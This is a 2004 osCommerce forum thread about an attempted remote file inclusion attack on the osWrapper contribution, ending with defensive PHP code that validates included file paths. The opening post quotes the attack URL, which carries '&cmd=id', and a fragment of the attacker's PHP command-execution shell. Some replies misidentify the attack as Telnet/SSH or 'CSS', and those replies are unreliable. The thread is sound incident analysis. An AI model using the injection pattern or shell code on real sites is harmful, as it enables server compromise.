walmslei Posted April 15, 2004

Hi Everyone

Someone tried to call the URL below a few days back (about 6am UK time) via the osWrapper contribution:

QUOTE
http://www.mysite.co.uk/wrapper.php?file=h...hkz.txt?&cmd=id

The file, HKZ.TXT, contains the following coding:

QUOTE
bash-2.05# /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); $output = str_replace("\n","\nbash-2.05# ",$output); if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output)); ?>

Anyone have any ideas on what they were trying to achieve? My understanding is that the osWrapper function cannot call an external site, as it does not exist within the 'wrapped' folder (my tests indicate an error message every time I have tried).

Comments appreciated!

I posted this a few days back under contributions/osWrapper but got no responses - apologies for the cross-posting now, but I felt this may be relevant to all osC users.
♥Vger Posted April 15, 2004

At first glance it looks like someone was trying to access your site either using Telnet or SSH, and was attempting to replace your content with their own. That's what it reads like to me.

This

$output = str_replace("\n","\nbash-2.05# ",$output); if (!empty($output)) echo str_replace

reads something like: string - replace, content, bash content, output, echo string replace if string replace is greater or lesser than output.

The problem is that they shouldn't have been able to get near your site to record anything in your logs using SSH or Telnet, not without the user name and password. So, perhaps it's internal, and something to do with the operation of the wrapper?

I've probably confused you even more, but these are my thoughts - for what they're worth!

Vger
Mark Evans Posted April 15, 2004

This was an attempted CSS attack which would go through your file system listing all files it found, which it would then send to itself for display.

From looking at the contribution it doesn't seem to have any kind of checks to ensure that the file being called is actually a local file, so I would be careful using this contribution.

Mark Evans
osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)
---------------------------------------
Software is like sex: It's better when it's free. (Linus Torvalds)
Chris Dunning Posted April 15, 2004

Just for reference, how would such a check be performed?

Chris Dunning
osCommerce, Contributions Moderator Team
Please do not send me PM! I do not read or answer these often. Use the email button instead!
I do NOT support contributions other than my own. Emails asking for support on other people's contributions will be ignored. Ask in the forum or contact the contribution author directly.
walmslei (Author) Posted April 16, 2004

Hi

Thanks for the help so far.

I do not think you can access external files using the wrapper module, as attempting to do so generates the following if you use the same syntax as our hacker (I replaced the URL of the dodgy text file with Google's for now).

http://www.mysite.co.uk/wrapper.php?file=h...ww.google.co.uk

Generates the error message:

Warning: main(wrapped/http://www.google.co.uk): failed to open stream: No such file or directory in /home/mysite/public_html/wrapper.php on line 51
Fatal error: main(): Failed opening required 'wrapped/http://www.google.co.uk' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mysite/public_html/wrapper.php on line 51

In which case I would assume it might be someone trying to exploit an earlier version of the module, or perhaps someone who has read a 'misguided' security warning.

I do not understand the Telnet or SSH thing, because the user agent is IE6 and it is an HTTP request, although I do not have much understanding of that side of things (I do know user agents can be spoofed though).

Anyways, I put in a few blocks for Brazil and the rest of South America (the originating country); s/he tried again last night (exactly the same URL, different IP but same range), got a 403 Forbidden code and disappeared.

Hopefully then no real problem. I would appreciate confirmation though about the wrapper module, from someone with some experience of PHP.
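To answer Chris's question about how the "is this a local file" check would be performed, and walmslei's request for confirmation about the prefix: the error message above shows the wrapper building the path as 'wrapped/' followed by the raw parameter, which is why a URL fails to open, but a prefix on its own is not a validation step. The example below is added here and is not osWrapper's own code; it assumes the pages live in a directory called 'wrapped' next to wrapper.php (as the error message suggests), and the function name wrapped_file_path and the 404 handling are my own choices. It refuses any value that is not a plain file name, resolves the result with realpath() and confirms it is still inside the wrapped directory before including it.

```php
<?php
// Added example (not osWrapper's own code): restrict an include to files
// that live inside one local directory. Assumes the wrapper keeps its pages
// in a 'wrapped' directory beside wrapper.php; the function name is hypothetical.

// Returns the absolute path of the requested file if it is inside $base_dir,
// or false if the request should be refused.
function wrapped_file_path($base_dir, $requested)
{
    // 1. Accept only a plain file name: letters, digits, dot, dash, underscore.
    //    This rules out "/", "\", ":", "?" and "&", so no URL (http://...),
    //    no query string and no parent-directory component can get through.
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $requested)) {
        return false;
    }
    if ($requested === '.' || $requested === '..') {
        return false;
    }

    // 2. Resolve both sides and confirm the target is still under the base.
    //    realpath() follows symlinks, collapses any remaining dot segments,
    //    and returns false when the file does not exist.
    $base = realpath($base_dir);
    $target = realpath($base_dir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $target === false) {
        return false;
    }
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }

    // 3. Serve regular files only, never a directory.
    if (!is_file($target)) {
        return false;
    }
    return $target;
}

// Usage inside the wrapper page, in place of an unchecked require of the
// raw parameter. Refused requests get a 404 and are logged for review.
$file = isset($_GET['file']) ? $_GET['file'] : '';
$path = wrapped_file_path(dirname(__FILE__) . '/wrapped', $file);
if ($path === false) {
    error_log('wrapper.php refused file parameter from ' . $_SERVER['REMOTE_ADDR']);
    header('HTTP/1.0 404 Not Found');
    echo 'Page not found';
    exit;
}
require($path);
?>
```

The character allow-list in step 1 is what stops the request shown in the first post before any file system call is made, since a URL contains ":" and "/" and the appended "?&cmd=id" contains "?" and "&"; step 2 is the belt-and-braces check that the resolved path is still inside the wrapped directory. If the set of wrapped pages is small and fixed, an explicit list of permitted file names compared against the parameter is stricter still and removes the need for the regular expression altogether.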